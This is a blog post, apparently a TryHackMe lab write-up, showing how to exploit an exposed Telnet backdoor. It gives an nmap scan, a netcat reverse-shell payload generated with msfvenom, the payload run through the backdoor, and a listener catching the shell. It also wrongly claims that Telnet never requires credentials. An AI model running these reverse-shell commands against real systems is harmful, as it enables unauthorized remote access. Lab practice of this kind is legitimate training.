Telnet

Network Attack
by TechnoHerder Leave a comment

If this service is running, it is a bright red flag that should be looked into immediately. Telnet does not require credentials. TryHackMe has a paid room that teaches Telnet.

https://tryhackme.com/room/networkservices

Telnet is an application protocol which allows the use of a telnet client to connect and execute commands on a remote machine that’s hosting a telnet server.

The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.

Telnet sends all messages in clear text and has no specific security mechanisms. Telnet has been replaced by SSH in most production environments.

The user connects to the server by using the Telnet protocol. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. The following command is used to connect to a telnet service:

telnet [ip] [port]

Begin by running reconnaissance on the the target macine:

sudo nmap -A -O -p- 10.10.147.86

PORT     STATE SERVICE VERSION
8012/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_    SKIDY’S BACKDOOR. Type .HELP to view commands

Why SKIDY, why???!!! Connect to it

telnet 10.10.200.201 8012
Trying 10.10.200.201...
Connected to 10.10.200.201.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
ls -- nothing....
.HELP
.HELP: View commands
.RUN : Execute commands
.EXIT: Exit
.RUN whoami -- nothing....
.RUN ls  -- nothing....
.RUN ping 10.13.12.54 -c 1

# That 10.13.12.54 is me on tun0, the IP from the VPN running.....

SWITCH TERMINALS
We’re going to generate a reverse shell payload using msfvenom. We don’t need tcpdump anymore, so kill it. Let’s set the lport environment variable for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.

export lport=4444msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R

Here is a more generic example to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for you.

msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

msfvenom -p cmd/unix/reverse_netcat lhost=10.13.12.54 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

nc -lvp 4444

That is setting up netcat to listen

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Cool, now go run that last line printed out back in the skidy’s terminal

.RUN mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Then it poops in the other terminal!!!!!!

nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
ls
Ncat: Connection from 10.10.200.201.
Ncat: Connection from 10.10.200.201:55650.
flag.txt

Leave a Reply

Your email address will not be published. Required fields are marked *